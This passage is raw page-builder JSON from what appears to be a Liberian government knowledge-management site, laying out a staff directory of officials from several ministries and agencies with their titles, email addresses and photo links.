href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a 